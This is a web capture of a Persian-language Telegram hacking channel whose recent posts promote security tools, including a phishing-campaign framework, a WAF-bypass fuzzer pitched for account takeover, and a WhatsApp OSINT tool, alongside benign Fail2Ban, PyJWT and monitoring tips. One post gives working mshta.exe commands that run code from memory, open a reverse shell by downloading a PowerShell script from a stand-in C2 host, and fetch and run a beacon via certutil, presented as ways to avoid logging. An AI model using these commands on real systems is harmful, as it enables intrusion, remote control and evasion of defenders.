TGViewer
Channel Public Channel
Hack 4҉҈ Man

Hack 4҉҈ Man

@hack4man

@durov Этот пост ни в коем случае не аморален.
Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный
#telegram_Rules
#Правила_телеграма
تبلیغات و ثبت آگهی👈 @tablighatsamaa
Subscribers
8.13K
Photos
28
Videos
1
Links
34
Recent Posts 20 shown
Post #583 67
💻 ؛REcollapse — دور زدن مکانیزم‌های امنیتی با استفاده از فازینگ

🔺؛REcollapse یک ابزار کمکی برای پردازش عبارات با قاعده در حالت "جعبه سیاه" است که امکان دور زدن بررسی‌ها و شناسایی نرمال‌سازی‌ها را در برنامه‌های وب فراهم می‌کند.

🔺هدف این ابزار، تولید بار کاری (payload) برای تست است.

🔺این ابزار می‌تواند برای سرقت حساب‌های کاربری بدون نیاز به تعامل کاربر، شناسایی راه‌های جدید برای دور زدن فایروال‌های برنامه‌های وب و موارد دیگر استفاده شود.

📌 لینک گیت‌هاب
t.me/Hack4Man
Post #554 991
💻 ابزار باج‌افزار Matrix — مجموعه‌ای از ابزارهای باج‌افزار

ابزار باج‌افزار Matrix یک مخزن جامع است که شامل فهرست‌بندی ابزارها و روش‌های مورد استفاده توسط گروه‌های مختلف باج‌افزار و سازمان‌های مرتبط با آن می‌شود.

— این ابزار اهداف متعددی را دنبال می‌کند:

1. ارائه لیستی از ابزارها برای شناسایی تهدیدات در محیط‌های مختلف؛
2. ارائه راهکارهایی برای واکنش به حوادث امنیتی؛
3. کمک به شناسایی الگوهای رفتاری در بین شاخه‌های مختلف باج‌افزار؛
4. ارائه منبعی برای تیم‌های متخصص در زمینه امنیت سایبری که تحت رهبری تحلیلگران تهدیدات فعالیت می‌کنند.

📌 لینک به گیتهاپ
t.me/Hack4Man
  • 👍 3
  • ❤ 1
Post #527 1.64K
🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه

؛Fail2Ban، لاگ‌های سرویس‌های سیستم را تحلیل می‌کند، فعالیت‌های مشکوک را شناسایی کرده و به طور خودکار آدرس‌های IP مهاجمان را مسدود می‌کند.

پیکربندی سریع:
# ایجاد فایل پیکربندی محلی

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

# ویرایش قوانین
sudo nano /etc/fail2ban/jail.local

پارامترهای پایه (در ابتدای فایل):
bantime = 10m       # مدت زمان مسدودسازی
findtime = 10m       # بازه زمانی تحلیل
maxretry = 5         # تعداد تلاش‌ها قبل از مسدودسازی

پیکربندی برای SSH:
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5

اجرا و مدیریت:
# شروع و فعال‌سازی خودکار

sudo systemctl start fail2ban
sudo systemctl enable fail2ban

# بررسی وضعیت
sudo systemctl status fail2ban


# مشاهده آدرس‌های IP مسدود شده
sudo fail2ban-client status sshd


t.me/Hack4Man
  • ❤ 8
Post #522 1.57K
✅ WhatsApp-OSINT

این ابزار، عکس‌های پروفایل واتساپ را دریافت می‌کند، حساب‌های تجاری را بررسی می‌کند، وضعیت کاربران را تعیین می‌کند و دستگاه‌های مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل می‌کند.

📁 زبان: پایتون

⭐️ تعداد ستاره‌ها: 973

⬅️ لینک گیت‌هاب
t.me/Hack4Man
  • ❤ 3
Post #518 1.66K
🛡؛PatchMon: مدیریت متمرکز به‌روزرسانی‌ها در محیط‌های سرور

🔺این ابزار برای مدیران سیستم و تیم‌های امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز به‌روزرسانی‌ها را در سرورهای مختلف فراهم می‌کند. عوامل (agents) فقط از طریق کانال‌های خروجی با سرور PatchMon ارتباط برقرار می‌کنند، بنابراین نیازی به باز کردن پورت‌ها و مواجهه با خطرات امنیتی نیست.

قابلیت‌ها:
مدیریت متمرکز پچ‌ها در تعداد زیادی سرور

عوامل از طریق اتصالات خروجی کار می‌کنند (بدون نیاز به پورت‌های باز)

نمایش کامل وضعیت به‌روزرسانی‌ها

خودکارسازی ایمن فرآیندها


🔗 GitHub: PatchMon/PatchMon

t.me/Hack4Man
  • ❤ 3
Post #462 3.13K
📊یک ترمینال، مانیتورینگ مستقل را ارائه می‌دهد – نیازی به اجرای برنامه‌هایی مانند htop، iotop، nethogs و df نیست.

🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسک‌ها، شبکه، دما و باتری؛ قابل اجرا در سیستم‌عامل‌های Linux، macOS و Windows.

🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتب‌سازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.

🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسک‌ها با قابلیت نمایش تاریخچه.

🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگ‌نمایی زمانی.

📥 لینک به گیتهاپ

📌قابلیت سفارشی‌سازی در سطح تم‌ها، ویجت‌ها و فرکانس به‌روزرسانی. از ماوس پشتیبانی می‌شود.
t.me/Hack4Man
  • ❤ 2
Post #451 2.85K
📦 کتابخانه روز: PyJWT — کار با توکن‌های وب JSON

؛JWT یک استاندارد برای انتقال امن داده‌ها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکن‌ها است.

نصب:
pip install pyjwt

مثال: ایجاد و بررسی توکن:
import jwt
import datetime

SECRET_KEY = "your-secret-key"


# 1. ایجاد توکن
payload = {
    "user_id": 123,
    "username": "alex",
    "exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")


# 2. بررسی توکن
try:
    decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
    print("توکن منقضی شده است")
except jwt.InvalidTokenError:
    print("توکن نامعتبر است")


t.me/Hack4Man
  • ❤ 4
Post #436 2.88K
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ

🔺؛Phishing Frenzy یک ابزار قدرتمند و متن‌باز است که برای ایجاد و مدیریت کمپین‌های فیشینگ طراحی شده است.

🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار می‌دهد، از جمله ایجاد وب‌سایت‌های جعلی، ارسال ایمیل‌های فیشینگ و ردیابی نتایج حملات.

📌لینک گیت هاپ
t.me/Hack4Man
  • ❤ 1
Post #424 3.19K
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML

🔺فکر می‌کنید mshta.exe فقط برای اجرای فایل‌های .hta استفاده می‌شود؟ خنده‌دار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که می‌تواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود می‌شود و حتی زمانی که PowerShell غیرفعال است، کار می‌کند. بریم سراغش!

🔺؛mshta چه قابلیت‌هایی دارد (و چرا این موضوع عالی است)

1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()

این دستور cmd.exe را اجرا می‌کند و whoami را اجرا می‌کند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.

2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()

🔺این اسکریپت را از حافظه دانلود و اجرا می‌کند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمی‌شود.

3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()

🔺ترکیب mshta و certutil به شما امکان می‌دهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.

t.me/Hack4Man
  • ❤ 6
Post #396 3.43K
🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار

🔺این ابزار از عامل‌هایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده می‌کند. این عامل‌ها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار می‌کنند، خود تصمیم‌گیری می‌کنند و وظایف را انجام می‌دهند.

⚙ قابلیت‌ها:
معماری چندعاملی: عوامل مختلف مسئولیت‌های مختلفی مانند جمع‌آوری اطلاعات، اسکن و بهره‌برداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدل‌های کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیت‌های عوامل به صورت زنده.

🔗 GitHub: PentAGI

t.me/Hack4Man
  • 🔥 3
  • ❤ 2
  • 👍 1
Older posts →

About this channel

How can I read @hack4man without a Telegram account?
TGViewer shows the public web preview Telegram publishes for Hack 4҉҈ Man: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does Hack 4҉҈ Man have?
Hack 4҉҈ Man (@hack4man) has 8.13K subscribers on Telegram, refreshed roughly every 30 minutes.
Does Hack 4҉҈ Man know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →